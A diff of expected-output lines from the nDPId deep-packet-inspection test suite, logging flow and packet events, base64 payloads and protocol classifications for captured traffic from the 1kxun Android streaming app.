+00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1420,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104432630,"flow_last_seen":1470104432630,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1470104432630,"l3_proto":"ip6","src_ip":"fe80::5d92:62a8:ebde:1319","dst_ip":"ff02::1:3","src_port":58468,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1421,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104432630,"flow_last_seen":1470104432630,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1470104432630,"l3_proto":"ip4","src_ip":"192.168.3.236","dst_ip":"224.0.0.252","src_port":65496,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1421,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":129,"flow_packet_id":1,"flow_last_seen":1470104432630,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"thread_ts_msec":1470104432630,"pkt":"AQBeAAD8PKn0WgOECABFAAA3IDQAAAER8\/HAqAPs4AAA\/P\/YFOsAI0Pg7dQAAAABAAAAAAAACVdBTkdTLUxUVwAA\/wAB"} -00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1421,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104432630,"flow_last_seen":1470104432630,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1470104432630,"l3_proto":"ip4","src_ip":"192.168.3.236","dst_ip":"224.0.0.252","src_port":65496,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 
+00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1421,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104432630,"flow_last_seen":1470104432630,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1470104432630,"l3_proto":"ip4","src_ip":"192.168.3.236","dst_ip":"224.0.0.252","src_port":65496,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1422,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":128,"flow_packet_id":2,"flow_last_seen":1470104432728,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":89,"pkt_l4_len":35,"thread_ts_msec":1470104432728,"pkt":"MzMAAQADPKn0WgOEht1gAAAAACMRAf6AAAAAAAAAXZJiqOveExn\/AgAAAAAAAAAAAAAAAQAD5GQU6wAjSCvt1AAAAAEAAAAAAAAJV0FOR1MtTFRXAAD\/AAE="} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1423,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":129,"flow_packet_id":2,"flow_last_seen":1470104432728,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"thread_ts_msec":1470104432728,"pkt":"AQBeAAD8PKn0WgOECABFAAA3IDUAAAER8\/DAqAPs4AAA\/P\/YFOsAI0Pg7dQAAAABAAAAAAAACVdBTkdTLUxUVwAA\/wAB"} 
00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1436,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":2,"flow_last_seen":1470104433649,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1470104433649,"pkt":"\/\/\/\/\/\/\/\/AAK2Qbs6CABFAABEAABAAEARd0fAqAK6\/\/\/\/\/4AAB5sAMBr8aWNSVlNvVTlBQUJYWldKRFlXeHNBSFZ0Ukc5c2IzSlRhWFJCYldVQQ=="} 00568{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1440,"source":"1kxun.pcap","alias":"nDPId-test","packets-captured":1440,"packets-processed":1439,"total-skipped-flows":0,"total-l4-payload-len":552863,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":109,"total-detection-updates":11,"total-updates":0,"current-active-flows":129,"total-active-flows":129,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":546,"global_ts_msec":1654385119050} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1440,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385119050,"flow_last_seen":1654385119050,"flow_idle_time":7580000,"flow_min_l4_payload_len":538,"flow_max_l4_payload_len":538,"flow_tot_l4_payload_len":538,"flow_avg_l4_payload_len":538,"midstream":1,"thread_ts_msec":1654385119050,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.104.93.92","src_port":60962,"dst_port":1234,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
01191{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1440,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":130,"flow_packet_id":1,"flow_last_seen":1654385119050,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":604,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":604,"pkt_l4_len":570,"thread_ts_msec":1654385119050,"pkt":"tKXvZygQnLbQ0+MzCABFAAJOAZpAAEAGaiXAqAJ+rGhdXO4iBNJ6yTZonxdjWoAYAfbPKwAAAQEICmbWNa+8oaeIR0VUIC8\/X2JyYW5kPUdvb2dsZSZfbW9kZWw9c2RrX2dwaG9uZV94ODYmX292PUFuZHJvaWQxMSZfY3B1PWk2ODYmX3Jlc29sdXRpb249MTA4MCUyQzE3OTQmX3BhY2thZ2U9Y29tLnNjZW5ld2F5LmthbmthbiZfdj0yLjguMi4xJl9jaGFubmVsPTFreHVuJl9jYXJyaWVyPTMxMDI2MCZfYW5kcm9pZF9pZD1iOWUyODc3NjM1NGQyNTllJl9uZXR3b3JrPXdpZmkmX2FpZD01YWM2YTBmZi04ZDE4LTQ3YmMtYTkwMi0yODEyY2YwYzI1MWUmJl9jb3VudHJ5PVVTJl9sb2NhbGU9ZW4mXz0xNjU0Mzg1MTE3IEhUVFAvMS4xDQphdXRob3JpemF0aW9uX2NvZGU6IDg5QTBGQ0UzOTE2OEM5RTIxOTM1N0IzRjJEMzA4RDIwDQpVcGdyYWRlOiB3ZWJzb2NrZXQNCkNvbm5lY3Rpb246IFVwZ3JhZGUNClNlYy1XZWJTb2NrZXQtS2V5OiBMVFJDT1VPdEIwdHRrSnJIdUhaRHRnPT0NClNlYy1XZWJTb2NrZXQtVmVyc2lvbjogMTMNCkhvc3Q6IHdzLjFreHVuLm1vYmk6MTIzNA0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQpVc2VyLUFnZW50OiBva2h0dHAvMy4xMC4wDQoNCg=="} -01180{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1440,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385119050,"flow_last_seen":1654385119050,"flow_idle_time":7580000,"flow_min_l4_payload_len":538,"flow_max_l4_payload_len":538,"flow_tot_l4_payload_len":538,"flow_avg_l4_payload_len":538,"midstream":1,"thread_ts_msec":1654385119050,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.104.93.92","src_port":60962,"dst_port":1234,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": 
{"hostname":"ws.1kxun.mobi","url":"ws.1kxun.mobi:1234\/?_brand=Google&_model=sdk_gphone_x86&_ov=Android11&_cpu=i686&_resolution=1080%2C1794&_package=com.sceneway.kankan&_v=2.8.2.1&_channel=1kxun&_carrier=310260&_android_id=b9e28776354d259e&_network=wifi&_aid=5ac6a0ff-8d18-47bc-a902-2812cf0c251e&&_country=US&_locale=en&_=1654385117","code":0,"content_type":"","user_agent":"okhttp\/3.10.0"}} +01180{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1440,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385119050,"flow_last_seen":1654385119050,"flow_idle_time":7580000,"flow_min_l4_payload_len":538,"flow_max_l4_payload_len":538,"flow_tot_l4_payload_len":538,"flow_avg_l4_payload_len":538,"midstream":1,"thread_ts_msec":1654385119050,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.104.93.92","src_port":60962,"dst_port":1234,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"ws.1kxun.mobi","url":"ws.1kxun.mobi:1234\/?_brand=Google&_model=sdk_gphone_x86&_ov=Android11&_cpu=i686&_resolution=1080%2C1794&_package=com.sceneway.kankan&_v=2.8.2.1&_channel=1kxun&_carrier=310260&_android_id=b9e28776354d259e&_network=wifi&_aid=5ac6a0ff-8d18-47bc-a902-2812cf0c251e&&_country=US&_locale=en&_=1654385117","code":0,"content_type":"","user_agent":"okhttp\/3.10.0"}} 
00722{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1441,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":130,"flow_packet_id":2,"flow_last_seen":1654385119358,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":255,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":255,"pkt_l4_len":221,"thread_ts_msec":1654385119358,"pkt":"nLbQ0+MztKXvZygQCABFAADxLm1AADYGSK+saF1cwKgCfgTS7iKfF2Naesk4goAYAfnUtgAAAQEICryhqPBm1jWvSFRUUC8xLjEgMTAxIFN3aXRjaGluZyBQcm90b2NvbHMNClVwZ3JhZGU6IHdlYnNvY2tldA0KQ29ubmVjdGlvbjogVXBncmFkZQ0KU2VjLVdlYlNvY2tldC1BY2NlcHQ6IFMxR1lPY3ZzV3BRa0lpb3FkaEFpMENndkJhdz0NClNlYy1XZWJTb2NrZXQtVmVyc2lvbjogMTMNClNlcnZlcjogc3dvb2xlLXdlYnNvY2tldC1zZXJ2ZXINCg0K"} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1442,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385119973,"flow_last_seen":1654385119973,"flow_idle_time":7580000,"flow_min_l4_payload_len":538,"flow_max_l4_payload_len":538,"flow_tot_l4_payload_len":538,"flow_avg_l4_payload_len":538,"midstream":1,"thread_ts_msec":1654385119973,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.104.93.92","src_port":60972,"dst_port":1234,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
01191{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1442,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":131,"flow_packet_id":1,"flow_last_seen":1654385119973,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":604,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":604,"pkt_l4_len":570,"thread_ts_msec":1654385119973,"pkt":"tKXvZygQnLbQ0+MzCABFAAJOd7pAAEAG9ATAqAJ+rGhdXO4sBNI37f0u8ShzhYAYAfbPKwAAAQEICmbWOUq8oasmR0VUIC8\/X2JyYW5kPUdvb2dsZSZfbW9kZWw9c2RrX2dwaG9uZV94ODYmX292PUFuZHJvaWQxMSZfY3B1PWk2ODYmX3Jlc29sdXRpb249MTA4MCUyQzE3OTQmX3BhY2thZ2U9Y29tLnNjZW5ld2F5LmthbmthbiZfdj0yLjguMi4xJl9jaGFubmVsPTFreHVuJl9jYXJyaWVyPTMxMDI2MCZfYW5kcm9pZF9pZD1iOWUyODc3NjM1NGQyNTllJl9uZXR3b3JrPXdpZmkmX2FpZD01YWM2YTBmZi04ZDE4LTQ3YmMtYTkwMi0yODEyY2YwYzI1MWUmJl9jb3VudHJ5PVVTJl9sb2NhbGU9ZW4mXz0xNjU0Mzg1MTE4IEhUVFAvMS4xDQphdXRob3JpemF0aW9uX2NvZGU6IDg5QTBGQ0UzOTE2OEM5RTIxOTM1N0IzRjJEMzA4RDIwDQpVcGdyYWRlOiB3ZWJzb2NrZXQNCkNvbm5lY3Rpb246IFVwZ3JhZGUNClNlYy1XZWJTb2NrZXQtS2V5OiBhVXMza2VlelV1aUhuMFlucmFuaTl3PT0NClNlYy1XZWJTb2NrZXQtVmVyc2lvbjogMTMNCkhvc3Q6IHdzLjFreHVuLm1vYmk6MTIzNA0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQpVc2VyLUFnZW50OiBva2h0dHAvMy4xMC4wDQoNCg=="} -01180{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1442,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385119973,"flow_last_seen":1654385119973,"flow_idle_time":7580000,"flow_min_l4_payload_len":538,"flow_max_l4_payload_len":538,"flow_tot_l4_payload_len":538,"flow_avg_l4_payload_len":538,"midstream":1,"thread_ts_msec":1654385119973,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.104.93.92","src_port":60972,"dst_port":1234,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": 
{"hostname":"ws.1kxun.mobi","url":"ws.1kxun.mobi:1234\/?_brand=Google&_model=sdk_gphone_x86&_ov=Android11&_cpu=i686&_resolution=1080%2C1794&_package=com.sceneway.kankan&_v=2.8.2.1&_channel=1kxun&_carrier=310260&_android_id=b9e28776354d259e&_network=wifi&_aid=5ac6a0ff-8d18-47bc-a902-2812cf0c251e&&_country=US&_locale=en&_=1654385118","code":0,"content_type":"","user_agent":"okhttp\/3.10.0"}} +01180{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1442,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385119973,"flow_last_seen":1654385119973,"flow_idle_time":7580000,"flow_min_l4_payload_len":538,"flow_max_l4_payload_len":538,"flow_tot_l4_payload_len":538,"flow_avg_l4_payload_len":538,"midstream":1,"thread_ts_msec":1654385119973,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.104.93.92","src_port":60972,"dst_port":1234,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"ws.1kxun.mobi","url":"ws.1kxun.mobi:1234\/?_brand=Google&_model=sdk_gphone_x86&_ov=Android11&_cpu=i686&_resolution=1080%2C1794&_package=com.sceneway.kankan&_v=2.8.2.1&_channel=1kxun&_carrier=310260&_android_id=b9e28776354d259e&_network=wifi&_aid=5ac6a0ff-8d18-47bc-a902-2812cf0c251e&&_country=US&_locale=en&_=1654385118","code":0,"content_type":"","user_agent":"okhttp\/3.10.0"}} 
00723{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1443,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":131,"flow_packet_id":2,"flow_last_seen":1654385120216,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":255,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":255,"pkt_l4_len":221,"thread_ts_msec":1654385120216,"pkt":"nLbQ0+MztKXvZygQCABFAADxBX1AADYGcZ+saF1cwKgCfgTS7izxKHOFN+3\/SIAYAflO7QAAAQEICryhrIhm1jlKSFRUUC8xLjEgMTAxIFN3aXRjaGluZyBQcm90b2NvbHMNClVwZ3JhZGU6IHdlYnNvY2tldA0KQ29ubmVjdGlvbjogVXBncmFkZQ0KU2VjLVdlYlNvY2tldC1BY2NlcHQ6IEtVa3drYTlicGVRVFVqNFdjZnNKekJpSXRUST0NClNlYy1XZWJTb2NrZXQtVmVyc2lvbjogMTMNClNlcnZlcjogc3dvb2xlLXdlYnNvY2tldC1zZXJ2ZXINCg0K"} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1444,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385120896,"flow_last_seen":1654385120896,"flow_idle_time":7580000,"flow_min_l4_payload_len":538,"flow_max_l4_payload_len":538,"flow_tot_l4_payload_len":538,"flow_avg_l4_payload_len":538,"midstream":1,"thread_ts_msec":1654385120896,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.104.93.92","src_port":60984,"dst_port":1234,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01191{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1444,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":132,"flow_packet_id":1,"flow_last_seen":1654385120896,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":604,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":604,"pkt_l4_len":570,"thread_ts_msec":1654385120896,"pkt":"tKXvZygQnLbQ0+MzCABFAAJOiDpAAEAG44TAqAJ+rGhdXO44BNLYsfEUYaCrMIAYAfbPKwAAAQEICmbWPOa8oa7yR0VUIC8\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"} 
-01180{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1444,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385120896,"flow_last_seen":1654385120896,"flow_idle_time":7580000,"flow_min_l4_payload_len":538,"flow_max_l4_payload_len":538,"flow_tot_l4_payload_len":538,"flow_avg_l4_payload_len":538,"midstream":1,"thread_ts_msec":1654385120896,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.104.93.92","src_port":60984,"dst_port":1234,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"ws.1kxun.mobi","url":"ws.1kxun.mobi:1234\/?_brand=Google&_model=sdk_gphone_x86&_ov=Android11&_cpu=i686&_resolution=1080%2C1794&_package=com.sceneway.kankan&_v=2.8.2.1&_channel=1kxun&_carrier=310260&_android_id=b9e28776354d259e&_network=wifi&_aid=5ac6a0ff-8d18-47bc-a902-2812cf0c251e&&_country=US&_locale=en&_=1654385119","code":0,"content_type":"","user_agent":"okhttp\/3.10.0"}} +01180{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1444,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385120896,"flow_last_seen":1654385120896,"flow_idle_time":7580000,"flow_min_l4_payload_len":538,"flow_max_l4_payload_len":538,"flow_tot_l4_payload_len":538,"flow_avg_l4_payload_len":538,"midstream":1,"thread_ts_msec":1654385120896,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.104.93.92","src_port":60984,"dst_port":1234,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": 
{"hostname":"ws.1kxun.mobi","url":"ws.1kxun.mobi:1234\/?_brand=Google&_model=sdk_gphone_x86&_ov=Android11&_cpu=i686&_resolution=1080%2C1794&_package=com.sceneway.kankan&_v=2.8.2.1&_channel=1kxun&_carrier=310260&_android_id=b9e28776354d259e&_network=wifi&_aid=5ac6a0ff-8d18-47bc-a902-2812cf0c251e&&_country=US&_locale=en&_=1654385119","code":0,"content_type":"","user_agent":"okhttp\/3.10.0"}} 00722{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1445,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":132,"flow_packet_id":2,"flow_last_seen":1654385121164,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":255,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":255,"pkt_l4_len":221,"thread_ts_msec":1654385121164,"pkt":"nLbQ0+MztKXvZygQCABFAADxUyNAADUGJPmsaF1cwKgCfgTS7jhhoKsw2LHzLoAYAfl7JgAAAQEICryhsD9m1jzmSFRUUC8xLjEgMTAxIFN3aXRjaGluZyBQcm90b2NvbHMNClVwZ3JhZGU6IHdlYnNvY2tldA0KQ29ubmVjdGlvbjogVXBncmFkZQ0KU2VjLVdlYlNvY2tldC1BY2NlcHQ6IC9xNHA4dFI0THBxMFc5OUR5YXRzaEViNXM0UT0NClNlYy1XZWJTb2NrZXQtVmVyc2lvbjogMTMNClNlcnZlcjogc3dvb2xlLXdlYnNvY2tldC1zZXJ2ZXINCg0K"} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1446,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385127244,"flow_last_seen":1654385127244,"flow_idle_time":7580000,"flow_min_l4_payload_len":157,"flow_max_l4_payload_len":157,"flow_tot_l4_payload_len":157,"flow_avg_l4_payload_len":157,"midstream":1,"thread_ts_msec":1654385127244,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":47230,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00682{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1446,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":133,"flow_packet_id":1,"flow_last_seen":1654385127244,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":223,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":223,"pkt_l4_len":189,"thread_ts_msec":1654385127244,"pkt":"tKXvZygQnLbQ0+MzCABFAADRE9lAAEAGtJXAqAJ+oXUNHbh+AFDtitlbh1f3JIAYAfZyfAAAAQEICrrF4XWXEOLhR0VUIC9hcGkuZG9tYWluLmNvbmYgSFRUUC8xLjENCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQpIb3N0OiBrYW5rYW4uMWt4dW4ubW9iaQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQpVc2VyLUFnZW50OiBva2h0dHAvMy4xMC4wDQoNCg=="} -00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1446,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385127244,"flow_last_seen":1654385127244,"flow_idle_time":7580000,"flow_min_l4_payload_len":157,"flow_max_l4_payload_len":157,"flow_tot_l4_payload_len":157,"flow_avg_l4_payload_len":157,"midstream":1,"thread_ts_msec":1654385127244,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":47230,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"kankan.1kxun.mobi","url":"kankan.1kxun.mobi\/api.domain.conf","code":0,"content_type":"","user_agent":"okhttp\/3.10.0"}} 
+00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1446,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385127244,"flow_last_seen":1654385127244,"flow_idle_time":7580000,"flow_min_l4_payload_len":157,"flow_max_l4_payload_len":157,"flow_tot_l4_payload_len":157,"flow_avg_l4_payload_len":157,"midstream":1,"thread_ts_msec":1654385127244,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":47230,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"kankan.1kxun.mobi","url":"kankan.1kxun.mobi\/api.domain.conf","code":0,"content_type":"","user_agent":"okhttp\/3.10.0"}} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1447,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385127293,"flow_last_seen":1654385127293,"flow_idle_time":7580000,"flow_min_l4_payload_len":270,"flow_max_l4_payload_len":270,"flow_tot_l4_payload_len":270,"flow_avg_l4_payload_len":270,"midstream":1,"thread_ts_msec":1654385127293,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"129.226.107.77","src_port":41134,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00815{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1447,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":134,"flow_packet_id":1,"flow_last_seen":1654385127293,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":324,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":324,"pkt_l4_len":290,"thread_ts_msec":1654385127293,"pkt":"tKXvZygQnLbQ0+MzCABFAAE2ngNAAEAG62jAqAJ+geJrTaCuAFAAOroVfx7qtFAYAfaxfgAAR0VUIC9xcWNvbm5lY3RvcGVuL29wZW5hcGkvcG9saWN5X2NvbmY\/c3RhdHVzX29zPTExJnN0YXR1c192ZXJzaW9uPTMwJnN0YXR1c19tYWNoaW5lPXNka19ncGhvbmVfeDg2JnNka3A9YSZzZGt2PTMuMS4wLmxpdGUmYXBwaWQ9MTAwMjU4MTM1IEhUVFAvMS4xDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANCkhvc3Q6IGNnaS5jb25uZWN0LnFxLmNvbQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogQW5kcm9pZFNES18zMF9nZW5lcmljX3g4Nl9hcm1fMTENCg0K"} -00920{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1447,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385127293,"flow_last_seen":1654385127293,"flow_idle_time":7580000,"flow_min_l4_payload_len":270,"flow_max_l4_payload_len":270,"flow_tot_l4_payload_len":270,"flow_avg_l4_payload_len":270,"midstream":1,"thread_ts_msec":1654385127293,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"129.226.107.77","src_port":41134,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Chat"},"http": {"hostname":"cgi.connect.qq.com","url":"cgi.connect.qq.com\/qqconnectopen\/openapi\/policy_conf?status_os=11&status_version=30&status_machine=sdk_gphone_x86&sdkp=a&sdkv=3.1.0.lite&appid=100258135","code":0,"content_type":"","user_agent":"AndroidSDK_30_generic_x86_arm_11"}} 
